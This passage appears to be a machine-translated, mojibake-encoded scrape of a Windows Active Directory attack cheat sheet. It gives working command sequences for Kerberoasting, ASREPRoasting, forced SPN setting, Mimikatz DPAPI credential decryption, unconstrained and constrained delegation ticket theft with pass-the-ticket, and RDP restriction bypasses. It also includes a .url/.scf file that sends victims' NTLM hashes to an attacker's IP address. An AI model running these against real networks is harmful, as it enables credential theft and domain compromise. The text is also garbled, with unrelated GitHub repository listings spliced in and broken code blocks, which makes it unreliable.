    :exclamation: рдпрджрд┐ рд░рд┐рдореЛрдЯ рдорд╢реАрди рдкрд░ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдореЛрдб рдЕрдХреНрд╖рдо рд╣реИ, рддреЛ рд╣рдо psexec рдпрд╛ winrm рдЬреИрд╕реЗ рдХрд┐рд╕реА рдЕрдиреНрдп рдЯреВрд▓/рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣реЛрд╕реНрдЯ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдирд┐рдореНрди рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдмрдирд╛рдХрд░ рддрдерд╛ рдЗрд╕рдХрд╛ рдорд╛рди рд╢реВрдиреНрдп рд╕реЗрдЯ рдХрд░рдХреЗ рдЗрд╕реЗ рд╕рдХреНрд╖рдо рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
    
    - "Single Session per User" рдкреНрд░рддрд┐рдмрдВрдз рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░реЗрдВ
    
    рдбреЛрдореЗрди рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░, рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рд╕рд┐рд╕реНрдЯрдо рдпрд╛ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рд╣реИ рдФрд░ рдЖрдк рдПрдХ RDP рд╕рддреНрд░ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХреЛрдИ рдЕрдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╣рд▓реЗ рд╕реЗ рдХрд░ рд░рд╣рд╛ рд╣реИ, рддреЛ рдЖрдк рдирд┐рдореНрди рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдЬреЛрдбрд╝рдХрд░ рдПрдХрд▓ рд╕рддреНрд░ рдкреНрд░рддрд┐рдмрдВрдз рд╕реЗ рдмрдЪ рд╕рдХрддреЗ рд╣реИрдВ:```powershell
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0
    

рдЬрдм рдЖрдк рд╡рд╛рдВрдЫрд┐рдд рдХрд╛рд░реНрдп рдкреВрд░рд╛ рдХрд░ рд▓реЗрдВ, рддреЛ рдЖрдк рдПрдХрд▓-рд╕рддреНрд░-рдкреНрд░рддрд┐-рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рддрд┐рдмрдВрдз рдХреЛ рдмрд╣рд╛рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреБрдВрдЬреА рд╣рдЯрд╛ рд╕рдХрддреЗ рд╣реИрдВред```powershell REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUse

root@kitploit:~
    
    
    ### URL рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЗ
    
    - .url рдлрд╝рд╛рдЗрд▓  ```
      [InternetShortcut]
      URL=whatever
      WorkingDirectory=whatever
      IconFile=\\<AttackersIp>\%USERNAME%.icon
      IconIndex=1
    

  * explain-dalibo/pev2 \- рдкреЛрд╕реНрдЯрдЧреНрд░реЗрд╕ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдЬреЛ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЬрдирд╛рдУрдВ рдХрд╛ рдореВрд▓реНрдпрд╛рдВрдХрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рд╕рдВрд╕реНрдХрд░рдг 2 рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдкреБрдирд░реНрд▓рд┐рдЦрд┐рддред
  * AppFlowy-IO/AppFlowy \- Notion рдХрд╛ рдУрдкрди рд╕реЛрд░реНрд╕ рд╡рд┐рдХрд▓реНрдк, рдЬреЛ рдбреЗрдЯрд╛ рдирд┐рдпрдВрддреНрд░рдг рдФрд░ рдЕрдиреБрдХреВрд▓рди рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
  * toeverything/AFFiNE \- Notion рдФрд░ Miro рдХрд╛ рдУрдкрди рд╕реЛрд░реНрд╕ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрди, рдЧреЛрдкрдиреАрдпрддрд╛ рдХреЛ рдкреНрд░рд╛рдердорд┐рдХрддрд╛ рджреЗрддреЗ рд╣реБрдП, рджрд╕реНрддрд╛рд╡реЗрдЬрд╝, рд╡реНрд╣рд╛рдЗрдЯрдмреЛрд░реНрдб рдФрд░ рдбреЗрдЯрд╛рдмреЗрд╕ рдХрд╛ рд╡рд┐рд▓рдп рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
  * intel/intel-one-mono \- рдбреЗрд╡рд▓рдкрд░реНрд╕ рдХреЗ рд▓рд┐рдП рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рдПрдХ рдЕрднрд┐рд╡реНрдпрдВрдЬрдХ рдореЛрдиреЛрд╕реНрдкреЗрд╕ рдлрд╝реЙрдиреНрдЯред
  * nicoverbruggen/phpmon \- Mac рдХреЗ рд▓рд┐рдП рд╣рд▓реНрдХрд╛, рдореВрд▓ PHP рдкреНрд░рдмрдВрдзрди рдореЙрдирд┐рдЯрд░ред
  * milanm/DevOps-Roadmap \- рдореБрдлрд╝реНрдд рд╢рд┐рдХреНрд╖рдг рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХреЗ рд╕рд╛рде DevOps рдЗрдВрдЬреАрдирд┐рдпрд░ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЪрд░рдг-рджрд░-рдЪрд░рдг рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛ред
  * nicbarker/clay \- C рдореЗрдВ рдЙрдЪреНрдЪ рдкреНрд░рджрд░реНрд╢рди UI рд▓реЗрдЖрдЙрдЯ рд▓рд╛рдЗрдмреНрд░реЗрд░реАред
  * nicbarker/clay \- C рдореЗрдВ рдЙрдЪреНрдЪ рдкреНрд░рджрд░реНрд╢рди UI рд▓реЗрдЖрдЙрдЯ рд▓рд╛рдЗрдмреНрд░реЗрд░реАред
  * mongodb/mongo-go-driver \- MongoDB рдХреЗ рд▓рд┐рдП рдЖрдзрд┐рдХрд╛рд░рд┐рдХ Go рдбреНрд░рд╛рдЗрд╡рд░ред
  * milanm/DevOps-Roadmap \- рдореБрдлрд╝реНрдд рд╢рд┐рдХреНрд╖рдг рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХреЗ рд╕рд╛рде DevOps рдЗрдВрдЬреАрдирд┐рдпрд░ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЪрд░рдг-рджрд░-рдЪрд░рдг рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛ред
  * mongodb/mongo-go-driver \- MongoDB рдХреЗ рд▓рд┐рдП рдЖрдзрд┐рдХрд╛рд░рд┐рдХ Go рдбреНрд░рд╛рдЗрд╡рд░ред ``` [InternetShortcut] URL=file:///leak/leak.html 

root@kitploit:~



  * .scf рдлрд╝рд╛рдЗрд▓ ``` [Shell] Command=2 IconFile=\\Share\test.ico [Taskbar] Command=ToggleDesktop 

root@kitploit:~




рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдПрдХ рд▓рд┐рдЦрдиреЗ рдпреЛрдЧреНрдп рд╢реЗрдпрд░ рдореЗрдВ рд░рдЦрдиреЗ рдкрд░ рдкреАрдбрд╝рд┐рдд рдХреЛ рдХреЗрд╡рд▓ рдлрд╝рд╛рдЗрд▓ рдПрдХреНрд╕рдкреНрд▓реЛрд░рд░ рдЦреЛрд▓рдирд╛ рд╣реЛрддрд╛ рд╣реИ рдФрд░ рд╢реЗрдпрд░ рдкрд░ рдиреЗрд╡рд┐рдЧреЗрдЯ рдХрд░рдирд╛ рд╣реЛрддрд╛ рд╣реИред **рдзреНрдпрд╛рди рджреЗрдВ** рдХрд┐ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЦреЛрд▓рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ рдпрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЗрд╕рдХреЗ рд╕рд╛рде рдмрд╛рддрдЪреАрдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЗрд╕реЗ рдкреНрд░рд╕реНрддреБрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдпрд╛ рддреЛ рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рд╢реАрд░реНрд╖ рдкрд░ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рдпрд╛ рд╡рд┐рдВрдбреЛрдЬ рдПрдХреНрд╕рдкреНрд▓реЛрд░рд░ рд╡рд┐рдВрдбреЛ рдореЗрдВ рджрд┐рдЦрд╛рдИ рджреЗрдирд╛ рдЪрд╛рд╣рд┐рдПред рд╣реИрд╢ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд░рд┐рд╕реНрдкреЙрдиреНрдбрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред

тЭЧ .scf рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЗ рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдкрд░ рдХрд╛рдо рдирд╣реАрдВ рдХрд░реЗрдВрдЧреЗред

### рдЙрдкрдпреЛрдЧреА рдЙрдкрдХрд░рдг

  * Powercat рдиреЗрдЯрдХреИрдЯ рдЬреЛ рдкрд╛рд╡рд░рд╢реЗрд▓ рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдЯрдирд▓рд┐рдВрдЧ, рд░рд┐рд▓реЗ рдФрд░ рдкреЛрд░реНрдЯрдлреЙрд░реНрд╡рд░реНрдб рдХреНрд╖рдорддрд╛рдПрдВ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
  * SCShell рдлрд╝рд╛рдЗрд▓рд▓реЗрд╕ рд▓реЗрдЯрд░рд▓ рдореВрд╡рдореЗрдВрдЯ рдЯреВрд▓ рдЬреЛ рдХрдорд╛рдВрдб рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП ChangeServiceConfigA рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддрд╛ рд╣реИред
  * Evil-Winrm рд╣реИрдХрд┐рдВрдЧ/рдкреЗрдВрдЯреЗрд╕реНрдЯрд┐рдВрдЧ рдХреЗ рд▓рд┐рдП рдЕрдВрддрд┐рдо WinRM рд╢реЗрд▓ред
  * RunasCs рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рдмрд┐рд▓реНрдЯ-рдЗрди runas.exe рдХрд╛ Csharp рдФрд░ рдУрдкрди рд╡рд░реНрдЬрд╝рдиред
  * ntlm_theft рдпреВрдЖрд░рдПрд▓ рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЛрдВ рдХреЗ рд▓рд┐рдП рд╕рднреА рд╕рдВрднрд╛рд╡рд┐рдд рдлрд╝рд╛рдЗрд▓ рдкреНрд░рд╛рд░реВрдк рдмрдирд╛рддрд╛ рд╣реИред



## рдбреЛрдореЗрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐

### Kerberoast

_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?:_   
рд╕рднреА рдорд╛рдирдХ рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рднреА рд╕реЗрд╡рд╛ рдЦрд╛рддреЛрдВ рдХреА рдПрдХ рдкреНрд░рддрд┐ рдФрд░ рдЙрдирдХреЗ рд╕рдВрдмрдВрдзрд┐рдд рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рд╣рдо рдХрд┐рд╕реА рднреА SPN рдХреЗ рд▓рд┐рдП TGS рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ 'рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛' рдЦрд╛рддреЗ рд╕реЗ рдмрдВрдзрд╛ рд╣реИ, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдмреНрд▓реЙрдм рдХреЛ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдСрдлрд╝рд▓рд╛рдЗрди рдЗрд╕реЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

  * PowerView: ```powershell #Get User Accounts that are used as Service Accounts Get-NetUser -SPN

#Get every available SPN account, request a TGS and dump its hash Invoke-Kerberoast

#Requesting the TGS for a single account: Request-SPNTicket

#Export all tickets using Mimikatz Invoke-Mimikatz -Command '"kerberos::list /export"'

root@kitploit:~

  * AD рдореЙрдбреНрдпреВрд▓: ```powershell #Get User Accounts that are used as Service Accounts Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

root@kitploit:~

  * Impacket: ```powershell python GetUserSPNs.py /: -outputfile 

root@kitploit:~

  * Rubeus: ```powershell #Kerberoasting and outputing on a file with a specific format Rubeus.exe kerberoast /outfile: /domain:

#Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts Rubeus.exe kerberoast /outfile: /domain: /rc4opsec

#Kerberoast AES enabled accounts Rubeus.exe kerberoast /outfile: /domain: /aes

#Kerberoast specific user account Rubeus.exe kerberoast /outfile: /domain: /user: /simple

#Kerberoast by specifying the authentication credentials Rubeus.exe kerberoast /outfile: /domain: /creduser: /credpassword:

root@kitploit:~




### ASREPRoast

_WUT IS DIS?:_   
рдпрджрд┐ рдХрд┐рд╕реА рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рдХреЛ рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдкреНрд░реАрдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ, рддреЛ рд╣рдо рдбреЛрдореЗрди рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреЗ рдмрд┐рдирд╛ рднреА рдЗрд╕ рдЦрд╛рддреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реИрдз TGT рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдмреНрд▓реЙрдм рдХреЛ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕реЗ рдСрдлрд▓рд╛рдЗрди рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

  * PowerView: `Get-DomainUser -PreauthNotRequired -Verbose`
  * AD Module: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth`



рдПрдХ рдРрд╕реЗ рдЦрд╛рддреЗ рдкрд░ рдЬрдмрд░рди рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдкреНрд░реАрдСрде рдХреЛ рдЕрдХреНрд╖рдо рдХрд░реЗрдВ рдЬрд┐рд╕ рдкрд░ рдореЗрд░реЗ рдкрд╛рд╕ рд░рд╛рдЗрдЯ рдкрд░рдорд┐рд╢рди рдпрд╛ рдЙрд╕рд╕реЗ рдЕрдзрд┐рдХ рд╣реИ! рдЦрд╛рддреЛрдВ рдкрд░ рджрд┐рд▓рдЪрд╕реНрдк рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ:

**рд╕рдВрдХреЗрдд:** рд╣рдо рдПрдХ рдлрд╝рд┐рд▓реНрдЯрд░ рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ рдЬреИрд╕реЗ RDPUsers рддрд╛рдХрд┐ "рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ" рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ, рдорд╢реАрди рдЦрд╛рддреЗ рдирд╣реАрдВ, рдХреНрдпреЛрдВрдХрд┐ рдорд╢реАрди рдЦрд╛рддрд╛ рд╣реИрд╢ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдпреЛрдЧреНрдп рдирд╣реАрдВ рд╣реЛрддреЗ!

PowerView:```powershell Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} Disable Kerberos Preauth: Set-DomainObject -Identity  -XOR @{useraccountcontrol=4194304} -Verbose Check if the value changed: Get-DomainUser -PreauthNotRequired -Verbose

root@kitploit:~
    
    
    - рдФрд░ рдЕрдВрдд рдореЗрдВ [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣рдорд▓рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВред  ```powershell
      #Get a specific Accounts hash:
      Get-ASREPHash -UserName <UserName> -Verbose
    
      #Get any ASREPRoastable Users hashes:
      Invoke-ASREPRoast -Verbose
    

  * Rubeus рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛: ```powershell #Trying the attack for all domain users Rubeus.exe asreproast /format:<hashcat|john> /domain: /outfile:

#ASREPRoast specific user Rubeus.exe asreproast /user: /format:<hashcat|john> /domain: /outfile:

#ASREPRoast users of a specific OU (Organization Unit) Rubeus.exe asreproast /ou: /format:<hashcat|john> /domain: /outfile:

root@kitploit:~

  * Impacket рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП: ```powershell #Trying the attack for the specified users on the file python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile 

root@kitploit:~




### Password Spray рд╣рдорд▓рд╛

рдпрджрд┐ рд╣рдордиреЗ рдХрд┐рд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдХреЗ рдХреБрдЫ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд┐рдП рд╣реИрдВ, рддреЛ рд╣рдо рдЗрд╕ рд╡рд┐рдзрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрдиреНрдп рдбреЛрдореЗрди рдЦрд╛рддреЛрдВ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкреБрди: рдЙрдкрдпреЛрдЧ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

**Tools:**

  * DomainPasswordSpray
  * CrackMapExec
  * Invoke-CleverSpray
  * Spray



### рдмрд▓рдкреВрд░реНрд╡рдХ SPN рд╕реЗрдЯ рдХрд░рдирд╛

_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдкрд░реНрдпрд╛рдкреНрдд рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВ - > GenericAll/GenericWrite, рддреЛ рд╣рдо рд▓рдХреНрд╖реНрдп рдЦрд╛рддреЗ рдкрд░ рдПрдХ SPN рд╕реЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдПрдХ TGS рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдлрд┐рд░ рдЙрд╕рдХрд╛ рдмреНрд▓реЙрдм рдкреНрд░рд╛рдкреНрдд рдХрд░рдХреЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред_

  * PowerView: ```powershell #Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}

#Check if current user has already an SPN setted: Get-DomainUser -Identity  | select serviceprincipalname

#Force set the SPN on the account: Set-DomainObject  -Set @{serviceprincipalname='ops/whatever1'}

root@kitploit:~

  * AD рдореЙрдбреНрдпреВрд▓: ```powershell #Check if current user has already an SPN setted Get-ADUser -Identity  -Properties ServicePrincipalName | select ServicePrincipalName

#Force set the SPN on the account: Set-ADUser -Identiny  -ServicePrincipalNames @{Add='ops/whatever1'}

root@kitploit:~




рдЕрдВрдд рдореЗрдВ рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдФрд░ рдЙрд╕реЗ kerberoast рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкрд╣рд▓реЗ рдХреЗ рдХрд┐рд╕реА рднреА рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред

### рд╢реИрдбреЛ рдХреЙрдкреАрдЬрд╝ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдХрд┐рд╕реА рдорд╢реАрди рдкрд░ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ рд╢реИрдбреЛ рдХреЙрдкреАрдЬрд╝ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ, рдпрд╣ рдбреЛрдореЗрди рдПрд╕реНрдХреЗрд▓реЗрд╢рди рдХрд╛ рдПрдХ рдЖрд╕рд╛рди рддрд░реАрдХрд╛ рд╣реИред```powershell #List shadow copies using vssadmin (Needs Admnistrator Access) vssadmin list shadows

#List shadow copies using diskshadow diskshadow list shadows all

#Make a symlink to the shadow copy and access it mklink /d c:\shadowcopy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

root@kitploit:~
    
    
    1. рдЖрдк рдмреИрдХрдЕрдк рдХреА рдЧрдИ SAM рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
    2. DPAPI рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдЦреЛрдЬреЗрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВред
    3. рдмреИрдХрдЕрдк рдХреА рдЧрдИ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдлрд╝рд╛рдЗрд▓реЛрдВ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред
    
    ### Mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдВ рдФрд░ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВ
    
    рд╕рд╛рдорд╛рдиреНрдпрддрдГ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдЗрдирдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреЗ рд╣реИрдВ:
    
    - `%appdata%\Microsoft\Credentials`
    - `%localappdata%\Microsoft\Credentials````powershell
    #By using the cred function of mimikatz we can enumerate the cred object and get information about it:
    dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
    
    #From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
    #Lets enumerate the Master Key:
    dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
    
    #Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
    dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
    
    #We now have the masterkey in our local cache:
    dpapi::cache
    
    #Finally we can decrypt the credential using the cached masterkey:
    dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
    

Detailed Article: DPAPI all the things

### рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддреНрдпрд╛рдпреЛрдЬрди

_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рдорд╢реАрди рдкрд░ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдкрд╣реБрдВрдЪ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддреНрдпрд╛рдпреЛрдЬрди рд╕рдХреНрд╖рдо рд╣реИ, рддреЛ рд╣рдо рдХрд┐рд╕реА рдЙрдЪреНрдЪ-рдореВрд▓реНрдп рд▓рдХреНрд╖реНрдп рдпрд╛ DA рдХреЗ рдЙрд╕рд╕реЗ рдХрдиреЗрдХреНрдЯ рд╣реЛрдиреЗ рдХреА рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЙрд╕рдХрд╛ TGT рдЪреБрд░рд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдлрд┐рд░ ptt рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЙрд╕рдХрд╛ рд░реВрдк рдзрд╛рд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ!_

PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП:```powershell #Discover domain joined computers that have Unconstrained Delegation enabled Get-NetComputer -UnConstrained

#List tickets and check if a DA or some High Value target has stored its TGT Invoke-Mimikatz -Command '"sekurlsa::tickets"'

#Command to monitor any incoming sessions on our compromised server Invoke-UserHunter -ComputerName  -Poll  -UserName  -Delay  -Verbose

#Dump the tickets to disk: Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

#Impersonate the user using ptt attack: Invoke-Mimikatz -Command '"kerberos::ptt "'

root@kitploit:~
    
    
    **рдиреЛрдЯ:** рд╣рдо Rubeus рдХрд╛ рднреА рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ!
    
    ### Constrained Delegation
    
    PowerView рдФрд░ Kekeo рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ:```powershell
    #Enumerate Users and Computers with constrained delegation
    Get-DomainUser -TrustedToAuth
    Get-DomainComputer -TrustedToAuth
    
    #If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
    tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
    
    #Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
    tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
    
    #Finally use mimikatz to ptt the TGS
    Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
    

_рд╡реИрдХрд▓реНрдкрд┐рдХ:_ Rubeus рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ:```powershell Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:"<Service's SPN>" /altservice: /ptt

root@kitploit:~
    
    
